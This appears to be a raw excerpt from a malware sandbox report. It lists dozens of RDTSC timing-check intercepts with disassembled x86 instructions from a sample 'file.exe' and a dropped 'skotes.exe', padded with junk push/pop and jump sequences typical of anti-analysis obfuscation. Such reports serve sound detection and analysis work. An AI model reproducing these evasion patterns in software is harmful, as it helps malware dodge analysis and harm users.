Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E031B second address: 54E0338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548006B second address: 548006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548006F second address: 5480075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480075 second address: 548007B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 548007B second address: 548007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0712 second address: 54E0716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0716 second address: 54E071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E071C second address: 54E07C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E810FCBAEh 0x00000011 jmp 00007F5E810FCBB5h 0x00000016 popfd 0x00000017 pushad 0x00000018 push eax 0x00000019 pop edi 0x0000001a push esi 0x0000001b pop edi 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov dl, 2Bh 0x00000022 jmp 00007F5E810FCBAEh 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F5E810FCBAEh 0x00000030 sbb esi, 33AAEDA8h 0x00000036 jmp 00007F5E810FCBABh 0x0000003b popfd 0x0000003c mov cx, CC9Fh 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 pushad 0x00000044 mov ecx, 7483B097h 0x00000049 call 00007F5E810FCBACh 0x0000004e mov bl, cl 0x00000050 pop edx 0x00000051 popad 0x00000052 push dword ptr [ebp+0Ch] 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov di, 03AAh 0x0000005c jmp 00007F5E810FCBABh 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E07C5 second address: 54E07F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E8080F35Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E07F4 second address: 54E0814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 51FC3CD3h 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0814 second address: 54E0846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007F5E8080F35Bh 0x0000000d sub si, 4BBEh 0x00000012 jmp 00007F5E8080F369h 0x00000017 popfd 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0914 second address: 54E0941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5E810FCBACh 0x0000000c add eax, 1AB45568h 0x00000012 jmp 00007F5E810FCBABh 0x00000017 popfd 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0941 second address: 54E0945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0945 second address: 54E0960 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0960 second address: 54E0966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0966 second address: 54E096A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0B994 second address: D0B998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490201 second address: 5490207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490207 second address: 549020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549020B second address: 5490239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5E810FCBB4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5E810FCBAAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490239 second address: 549023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549023D second address: 5490243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490243 second address: 54902E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F5E8080F360h 0x00000010 push FFFFFFFEh 0x00000012 jmp 00007F5E8080F360h 0x00000017 call 00007F5E8080F359h 0x0000001c jmp 00007F5E8080F360h 0x00000021 push eax 0x00000022 pushad 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 popad 0x00000028 mov eax, dword ptr [esp+04h] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F5E8080F365h 0x00000033 xor cl, FFFFFFB6h 0x00000036 jmp 00007F5E8080F361h 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [eax] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F5E8080F363h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54902E1 second address: 54902E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54902E7 second address: 54902EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54902EB second address: 5490311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push edi 0x00000011 mov dx, cx 0x00000014 pop ecx 0x00000015 mov bx, 1902h 0x00000019 popad 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490311 second address: 5490326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E8080F360h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490326 second address: 549032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549032C second address: 5490353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F5E8080F359h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E8080F364h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490353 second address: 5490359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490359 second address: 549035D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549035D second address: 54903BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5E810FCBB6h 0x00000010 sub ch, 00000058h 0x00000013 jmp 00007F5E810FCBABh 0x00000018 popfd 0x00000019 push ecx 0x0000001a mov bl, 70h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 pushad 0x00000023 movzx ecx, bx 0x00000026 movsx edx, cx 0x00000029 popad 0x0000002a mov eax, dword ptr [eax] 0x0000002c pushad 0x0000002d mov cx, di 0x00000030 push ebx 0x00000031 mov edx, esi 0x00000033 pop esi 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F5E810FCBACh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903BD second address: 54903C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903C3 second address: 54903C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903C9 second address: 54903CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903CD second address: 54903FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5E810FCBB2h 0x00000010 sub ax, 5C78h 0x00000015 jmp 00007F5E810FCBABh 0x0000001a popfd 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903FE second address: 5490423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000000h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E8080F367h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490423 second address: 54904DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov esi, 70DAD113h 0x00000010 jmp 00007F5E810FCBB8h 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F5E810FCBABh 0x0000001c nop 0x0000001d jmp 00007F5E810FCBB6h 0x00000022 sub esp, 1Ch 0x00000025 pushad 0x00000026 mov esi, 6CFF230Dh 0x0000002b popad 0x0000002c push esi 0x0000002d jmp 00007F5E810FCBB4h 0x00000032 mov dword ptr [esp], ebx 0x00000035 pushad 0x00000036 call 00007F5E810FCBAEh 0x0000003b pushfd 0x0000003c jmp 00007F5E810FCBB2h 0x00000041 sbb cx, 4AB8h 0x00000046 jmp 00007F5E810FCBABh 0x0000004b popfd 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f mov eax, edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54904DD second address: 5490535 instructions: 0x00000000 rdtsc 0x00000002 call 00007F5E8080F35Bh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebp 0x0000000c jmp 00007F5E8080F364h 0x00000011 mov dword ptr [esp], esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx ebx, cx 0x0000001a pushfd 0x0000001b jmp 00007F5E8080F366h 0x00000020 adc cx, A6A8h 0x00000025 jmp 00007F5E8080F35Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490535 second address: 5490580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 pushfd 0x00000011 jmp 00007F5E810FCBB4h 0x00000016 xor si, 3B68h 0x0000001b jmp 00007F5E810FCBABh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490580 second address: 54905A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54905A4 second address: 54905AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54905AA second address: 5490616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov ax, 2BC3h 0x0000000f pushfd 0x00000010 jmp 00007F5E8080F368h 0x00000015 add ax, 4288h 0x0000001a jmp 00007F5E8080F35Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [76FBB370h] 0x00000026 pushad 0x00000027 mov di, cx 0x0000002a jmp 00007F5E8080F360h 0x0000002f popad 0x00000030 xor dword ptr [ebp-08h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490616 second address: 549061D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549061D second address: 549067E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b jmp 00007F5E8080F361h 0x00000010 nop 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 pushad 0x00000016 mov bx, 809Ah 0x0000001a mov ax, dx 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F5E8080F35Ch 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5E8080F367h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549067E second address: 5490696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E810FCBB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490696 second address: 549074C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e jmp 00007F5E8080F366h 0x00000013 mov dword ptr fs:[00000000h], eax 0x00000019 pushad 0x0000001a call 00007F5E8080F35Eh 0x0000001f pop ebx 0x00000020 mov esi, 0FC8310Dh 0x00000025 popad 0x00000026 mov esi, dword ptr [ebp+08h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F5E8080F366h 0x00000030 adc ch, 00000058h 0x00000033 jmp 00007F5E8080F35Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F5E8080F368h 0x0000003f add ecx, 554770B8h 0x00000045 jmp 00007F5E8080F35Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov eax, dword ptr [esi+10h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F5E8080F365h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549074C second address: 5490790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F5E810FCBAEh 0x00000010 jne 00007F5EF2B2C159h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5E810FCBB7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490790 second address: 54908A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E8080F369h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F5E8080F367h 0x00000010 mov dword ptr [ebp-20h], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F5E8080F364h 0x0000001a or ax, 7498h 0x0000001f jmp 00007F5E8080F35Bh 0x00000024 popfd 0x00000025 movzx ecx, bx 0x00000028 popad 0x00000029 mov ebx, dword ptr [esi] 0x0000002b jmp 00007F5E8080F35Bh 0x00000030 mov dword ptr [ebp-24h], ebx 0x00000033 jmp 00007F5E8080F366h 0x00000038 test ebx, ebx 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F5E8080F35Eh 0x00000041 jmp 00007F5E8080F365h 0x00000046 popfd 0x00000047 jmp 00007F5E8080F360h 0x0000004c popad 0x0000004d je 00007F5EF223E780h 0x00000053 pushad 0x00000054 jmp 00007F5E8080F35Eh 0x00000059 pushfd 0x0000005a jmp 00007F5E8080F362h 0x0000005f sub eax, 12443E18h 0x00000065 jmp 00007F5E8080F35Bh 0x0000006a popfd 0x0000006b popad 0x0000006c cmp ebx, FFFFFFFFh 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 call 00007F5E8080F35Bh 0x00000077 pop esi 0x00000078 movsx edx, cx 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54908A4 second address: 5490201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E810FCBABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5EF2B2BF6Eh 0x0000000e jne 00007F5E810FCBC9h 0x00000010 xor ecx, ecx 0x00000012 mov dword ptr [esi], ecx 0x00000014 mov dword ptr [esi+04h], ecx 0x00000017 mov dword ptr [esi+08h], ecx 0x0000001a mov dword ptr [esi+0Ch], ecx 0x0000001d mov dword ptr [esi+10h], ecx 0x00000020 mov dword ptr [esi+14h], ecx 0x00000023 mov ecx, dword ptr [ebp-10h] 0x00000026 mov dword ptr fs:[00000000h], ecx 0x0000002d pop ecx 0x0000002e pop edi 0x0000002f pop esi 0x00000030 pop ebx 0x00000031 mov esp, ebp 0x00000033 pop ebp 0x00000034 retn 0004h 0x00000037 nop 0x00000038 pop ebp 0x00000039 ret 0x0000003a add esi, 18h 0x0000003d pop ecx 0x0000003e cmp esi, 00B556A8h 0x00000044 jne 00007F5E810FCB90h 0x00000046 push esi 0x00000047 call 00007F5E810FD413h 0x0000004c push ebp 0x0000004d mov ebp, esp 0x0000004f push dword ptr [ebp+08h] 0x00000052 call 00007F5E85A7FDD2h 0x00000057 mov edi, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F5E810FCBB5h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480CE4 second address: 5480D02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5E8080F35Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480D02 second address: 5480D08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 3378EF second address: 3378F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 3378F5 second address: 337902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F5E810FCBA6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 337902 second address: 337906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 337906 second address: 337923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F5E810FCBAEh 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 337923 second address: 337929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 326A6D second address: 326A72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 326A72 second address: 326A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F5E8080F356h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336CDE second address: 336CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336CE2 second address: 336CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E8080F356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336CEE second address: 336D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jne 00007F5E810FCBA6h 0x0000000b jmp 00007F5E810FCBABh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 jnp 00007F5E810FCBA6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336D13 second address: 336D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E8080F35Eh 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 336ED2 second address: 336ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AC97 second address: 33AC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AC9F second address: 33ACA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33ACA5 second address: 33ACCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5E8080F368h 0x0000000d pushad 0x0000000e js 00007F5E8080F356h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33ACCE second address: 33AD01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1CD0h], esi 0x0000000d push 00000000h 0x0000000f mov esi, dword ptr [ebp+122D200Ch] 0x00000015 mov ch, dh 0x00000017 push C92914E9h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007F5E810FCBB1h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AEC6 second address: 33AECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 33AECB second address: 33AED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
